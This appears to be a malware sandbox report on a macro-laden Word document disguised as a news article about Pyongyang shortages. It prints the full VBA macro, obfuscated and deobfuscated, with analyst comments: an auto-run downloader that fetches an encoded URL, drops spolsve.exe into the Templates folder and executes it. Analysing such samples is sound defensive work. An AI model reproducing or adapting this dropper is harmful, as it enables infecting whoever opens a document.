Malicious
Classifications

-

Threat Names

Mal/Generic-S Mal/HTMLGen-A

Remarks (1/1)

(0x0200005B): Activate Microsoft Office to ensure correct sample execution.

Filters:
File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\70fa2300d7932ab901c19878bf109bdd9e078e96380879ca2ce2c3f9fc5c7665.docx.doc Sample File Word Document
Malicious
MIME Type application/msword
File Size 52.00 KB
MD5 90a59c16d670fd77d710516299533834 Copy to Clipboard
SHA1 25c0a651d7bdfdfca2f37160837829bea669c5f7 Copy to Clipboard
SHA256 70fa2300d7932ab901c19878bf109bdd9e078e96380879ca2ce2c3f9fc5c7665 Copy to Clipboard
SSDeep 384:Mo8AY64U4jOHgiI/6iSY5UFXoOfYxFSAtcwqVCM+V0hxtjiK6yOrX0jui3M:t/7dRc6lCMvxp6yOL5i Copy to Clipboard
ImpHash -
Static Analysis Parser Error DocMetaProperty value is invalid
File Reputation Information
Verdict
Malicious
Names Mal/Generic-S
Office Information
Creator SNOOPY
Last Modified By user
Revision 5
Create Time 2020-11-26 23:28 (UTC+1)
Modify Time 2020-11-26 23:37 (UTC+1)
Codepage ANSI_Latin1
Application Microsoft Office Word
App Version 14.0
Template Normal.dotm
Company Microsoft
Document Security NONE
Editing Time 120.0
Page Count 3
Line Count 28
Paragraph Count 8
Word Count 599
Character Count 3417
Chars With Spaces 4008
Title 1
scale_crop False
shared_doc False
Controls (1)
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
VBA Macros (1)
Macro #1: ThisDocument
Deobfuscated Code
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Analyst notes - sandbox "Deobfuscated Code" view of the ThisDocument module.
' This listing is generated by the analysis tool, not written by the author:
' the object variables hhh / fff / bbb of the original module have been
' collapsed to the literal `0` (`Set 0 = ...`, `0.Open`), which is not valid
' VBA, one reference to `bbb` survived un-collapsed, and two hex divisors were
' folded to decimal (7056, 1861). Read it as an annotated trace of the
' original macro, not as runnable code.
'
' Behaviour visible in this module: Document_Open runs automatically when the
' document is opened with macros enabled, decodes a local file path and a URL
' from per-character integer arithmetic, fetches the URL with
' Microsoft.XMLHTTP, writes the response body to a file under the user's
' Templates folder via ADODB.Stream, and opens that file with
' Shell.Application - a standard macro downloader/dropper.
Private Sub Document_Open()
    Dim euelis As Object
    Dim itelro As String
    ' WScript.Shell is used only to resolve the per-user Templates folder,
    ' which becomes the drop directory for the downloaded file.
    Set euelis = CreateObject("WScript.Shell")
    itelro = euelis.SpecialFolders("Templates")
    Dim ccc
    Dim eee
    ' Forces the document text to black; presumably the lure text is stored
    ' in a non-visible colour so it only appears once macros run - confirm
    ' against the document body.
    ActiveDocument.Range.Font.Color = wdColorBlack
    ' Deobfuscator artifact: in the original these are `Set hhh = ...`
    ' (the HTTP client) and `Set fff = ...` (used to launch the dropped file).
    Set 0 = CreateObject("microsoft.xmlhttp")
    Set 0 = CreateObject("Shell.Application")
    ' Each Chr(a / CLng(b)) or Chr(a + CLng(b)) term evaluates to a single
    ' ASCII code, so the strings are built one character at a time instead of
    ' appearing as plain literals. eee = <Templates folder> & "\spolsve.exe"
    ' (reviewer decoding of the 12 terms; e.g. 649152 / &H1B90 = 92 = "\").
    eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))
    ' zzz & yyy together form the download URL; the first eight terms of zzz
    ' decode to "https://" (reviewer decoding). The host is not decoded here -
    ' see the sandbox's Extracted URLs / network log for the observed value.
    zzz = Chr(733824 / CLng(7056)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8596 + CLng(&H220B)) & Chr(1130143 / CLng(&H2519)) & Chr(624750 / CLng(&H1482)) & Chr(24656 / CLng(&H218)) & Chr(534432 / CLng(&H1250)) & Chr(604116 / CLng(&H1854)) & Chr(258622 / CLng(&HA4F)) & Chr(805003 / CLng(&H206B)) & Chr(589300 / CLng(&H1705)) & Chr(-9014 + CLng(&H2397)) & Chr(813384 / CLng(&H1B28)) & Chr(268400 / CLng(&H988)) & Chr(48990 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(112379 / CLng(&H407)) & Chr(-2799 + CLng(&HB1E)) & Chr(352121 / CLng(&HB8F)) & Chr(334221 / CLng(&HBC3)) & Chr(1117086 / CLng(&H2647)) & Chr(-2684 + CLng(&HAE0)) & Chr(182448 / CLng(&H65D)) & Chr(467628 / CLng(&H1006)) & Chr(719928 / CLng(&H1BD8)) & Chr(-6218 + CLng(&H18BD))
    yyy = Chr(214015 / CLng(1861)) & Chr(37976 / CLng(&H328)) & Chr(1077902 / CLng(&H2362)) & Chr(879536 / CLng(&H1EAD)) & Chr(130410 / CLng(&HB52)) & Chr(625482 / CLng(&H18AE)) & Chr(-4175 + CLng(&H10BE)) & Chr(617210 / CLng(&H15EB)) & Chr(1060008 / CLng(&H23B2)) & Chr(22927 / CLng(&HE3)) & Chr(1007930 / CLng(&H23CB)) & Chr(786480 / CLng(&H1A7C)) & Chr(241486 / CLng(&H1412)) & Chr(410176 / CLng(&HDD0)) & Chr(-2594 + CLng(&HA8A)) & Chr(246339 / CLng(&H987)) & Chr(66490 / CLng(&H262)) & Chr(368751 / CLng(&HE43)) & Chr(179170 / CLng(&H616)) & Chr(120978 / CLng(&HA0E)) & Chr(-5338 + CLng(&H152E)) & Chr(647634 / CLng(&H24AA)) & Chr(389774 / CLng(&H13C6)) & Chr(86000 / CLng(&H433)) & Chr(211462 / CLng(&H11F5)) & Chr(685630 / CLng(&H174A)) & Chr(-78 + CLng(&HBD))
    ' Synchronous HTTP GET (third argument False) issued from the Word process.
    0.Open "get", zzz + yyy, False
    0.send
    ccc = 0.responseBody
    If 0.Status = 200 Then
        ' ADODB.Stream with Type = 1 (adTypeBinary) writes the raw response
        ' bytes to disk; SaveToFile option 2 (adSaveCreateOverWrite) replaces
        ' any existing file at that path. `bbb` here is the un-collapsed
        ' original variable name for this stream object.
        Set 0 = CreateObject("adodb.stream")
        0.Open
        bbb.Type = 1
        0.Write ccc
        0.SaveToFile eee, 2
        0.Close
    End If
    ' Launches the dropped file via Shell.Application. This sits outside the
    ' status check, so it is attempted even when the download did not succeed.
    0.Open eee
End Sub


Original Code
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Analyst notes - sandbox "Original Code" view of the ThisDocument module as
' extracted from the Root\Macros\VBA\ThisDocument stream.
'
' Document_Open runs automatically when the document is opened with macros
' enabled. The macro resolves the user's Templates folder, decodes a drop path
' and a URL from per-character integer arithmetic, downloads the URL with
' Microsoft.XMLHTTP, writes the response to disk with ADODB.Stream and opens
' the saved file with Shell.Application. Obfuscation consists of Chr() of
' arithmetic expressions instead of string literals, an integer variable
' (ggg) standing in for the ADO constants, and unused decoy declarations.
Private Sub Document_Open()



  Dim euelis As Object
    Dim itelro As String

    ' WScript.Shell is used only to resolve the per-user Templates folder,
    ' which becomes the drop directory for the downloaded file.
    Set euelis = CreateObject("WScript.Shell")
    itelro = euelis.SpecialFolders("Templates")
' bbb: ADODB.Stream, ccc: response bytes, eee: drop path, fff: Shell.Application,
' ggg: the integer 1 used to build the ADO constants, hhh: XMLHTTP client.
' ddd and iii are declared but never referenced (noise).
Dim bbb
Dim ccc
Dim ddd
Dim eee
Dim fff
Dim ggg As Integer
Dim hhh
Dim iii
ggg = 1


' Forces the document text to black; presumably the lure text is stored in a
' non-visible colour so it only appears once macros run - confirm against the
' document body.
ActiveDocument.Range.Font.Color = wdColorBlack

Set hhh = CreateObject("microsoft.xmlhttp")
' dfefef decodes to the ProgID "Shell.Application" (matches the sandbox's
' deobfuscated view; e.g. 88395 / &H429 = 83 = "S"). Building the ProgID at
' runtime keeps it out of a plain string scan of the module.
Dim dfefef
dfefef = Chr(88395 / &H429) + Chr(-6659 + &H1A6B) & Chr(-5652 + &H1679) & Chr(111348 / &H407) & Chr(-2738 + &HB1E) & Chr(136114 / &HB8F) & Chr(195715 / &HBC3) & Chr(1097488 / &H2647) & Chr(-2672 + &HAE0) & Chr(175932 / &H65D) & Chr(430710 / &H1006) & Chr(705672 / &H1BD8) & Chr(-6236 + &H18BD) & Chr(215876 / &H745) & Chr(84840 / &H328) & Chr(1005438 / &H2362) & Chr(863830 / &H1EAD)
Set fff = CreateObject(dfefef)
' Each Chr(a / CLng(b)) or Chr(a + CLng(b)) term evaluates to one ASCII code.
' eee = <Templates folder> & "\spolsve.exe" (reviewer decoding of the 12
' terms; e.g. 649152 / &H1B90 = 92 = "\").
eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))

' zzz & yyy together form the download URL; the first eight terms of zzz
' decode to "https://" (reviewer decoding). The host is not decoded here -
' see the sandbox's Extracted URLs / network log for the observed value.
zzz = Chr(733824 / CLng(&H1B90)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8596 + CLng(&H220B)) & Chr(1130143 / CLng(&H2519)) & Chr(624750 / CLng(&H1482)) & Chr(24656 / CLng(&H218)) & Chr(534432 / CLng(&H1250)) & Chr(604116 / CLng(&H1854)) & Chr(258622 / CLng(&HA4F)) & Chr(805003 / CLng(&H206B)) & Chr(589300 / CLng(&H1705)) & Chr(-9014 + CLng(&H2397)) & Chr(813384 / CLng(&H1B28)) & Chr(268400 / CLng(&H988)) & Chr(48990 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(112379 / CLng(&H407)) & Chr(-2799 + CLng(&HB1E)) & Chr(352121 / CLng(&HB8F)) & Chr(334221 / CLng(&HBC3)) & Chr(1117086 / CLng(&H2647)) & Chr(-2684 + CLng(&HAE0)) & Chr(182448 / CLng(&H65D)) & Chr(467628 / CLng(&H1006)) & Chr(719928 / CLng(&H1BD8)) & Chr(-6218 + CLng(&H18BD))

yyy = Chr(214015 / CLng(&H745)) & Chr(37976 / CLng(&H328)) & Chr(1077902 / CLng(&H2362)) & Chr(879536 / CLng(&H1EAD)) & Chr(130410 / CLng(&HB52)) & Chr(625482 / CLng(&H18AE)) & Chr(-4175 + CLng(&H10BE)) & Chr(617210 / CLng(&H15EB)) & Chr(1060008 / CLng(&H23B2)) & Chr(22927 / CLng(&HE3)) & Chr(1007930 / CLng(&H23CB)) & Chr(786480 / CLng(&H1A7C)) & Chr(241486 / CLng(&H1412)) & Chr(410176 / CLng(&HDD0)) & Chr(-2594 + CLng(&HA8A)) & Chr(246339 / CLng(&H987)) & Chr(66490 / CLng(&H262)) & Chr(368751 / CLng(&HE43)) & Chr(179170 / CLng(&H616)) & Chr(120978 / CLng(&HA0E)) & Chr(-5338 + CLng(&H152E)) & Chr(647634 / CLng(&H24AA)) & Chr(389774 / CLng(&H13C6)) & Chr(86000 / CLng(&H433)) & Chr(211462 / CLng(&H11F5)) & Chr(685630 / CLng(&H174A)) & Chr(-78 + CLng(&HBD))

' Synchronous HTTP GET (third argument False) issued from the Word process.
hhh.Open "get", zzz + yyy, False
hhh.send
ccc = hhh.responseBody
If hhh.Status = 200 Then
' ggg = 1 gives Type = 1 (adTypeBinary); ggg + ggg = 2 is SaveToFile's
' adSaveCreateOverWrite, so an existing file at eee is replaced.
Set bbb = CreateObject("adodb.stream")
bbb.Open
bbb.Type = ggg
bbb.Write ccc
bbb.SaveToFile eee, ggg + ggg
bbb.Close
End If
' Launches the dropped file via Shell.Application. This sits outside the
' status check, so it is attempted even when the download did not succeed.
fff.Open (eee)
End Sub







Document Content Snippet
Pyongyang stores low on foreign goods amid North Korean COVID-19 paranoia
Amid an ongoing, full-scale border lockdown against COVID-19, North Korea on Tuesday warned its citizens against relying on imported foreign goods — calling the habit a dangerous disease that could spread the virus from abroad.
Pyongyang's warning against bringing in foreign goods is not just empty words, either: On Monday, sources told VOA that supermarkets and shops in Pyongyang have lacked foreign-sourced staples for months, including coffee, cocoa and chocolate. This appears to be out of paranoia that foreign goods could carry traces of COVID-19 — which is possible, according to the United Nations (https://www.un.org/en/coronavirus/covid-19-faqs), though not the most common way the virus has been transmitted worldwide.
Sources also told VOA that there's currently no evidence that food items are coming across the border from China, with only locally produced items available on Pyongyang store shelves.
INT
CFB Streams (15)
Name ID Size Actions
Root\Data 1 4.00 KB
Root\Table 2 7.17 KB
Root\WordDocument 3 9.04 KB
Root\SummaryInformation 4 4.00 KB
Root\DocumentSummaryInformation 5 4.00 KB
Root\Macros\VBA\dir 8 515 Bytes
Root\Macros\VBA\__SRP_0 9 1.67 KB
Root\Macros\VBA\__SRP_1 10 102 Bytes
Root\Macros\VBA\__SRP_2 11 3.91 KB
Root\Macros\VBA\__SRP_3 12 103 Bytes
Root\Macros\VBA\ThisDocument 13 8.17 KB
Root\Macros\VBA\_VBA_PROJECT 14 2.73 KB
Root\Macros\PROJECT 15 375 Bytes
Root\Macros\PROJECTwm 16 41 Bytes
Root\CompObj 17 114 Bytes
Extracted URLs (5)
URL WHOIS Data Reputation Status Recursively Submitted Actions
Not Available
Not Available
Not Available
Not Available
Not Available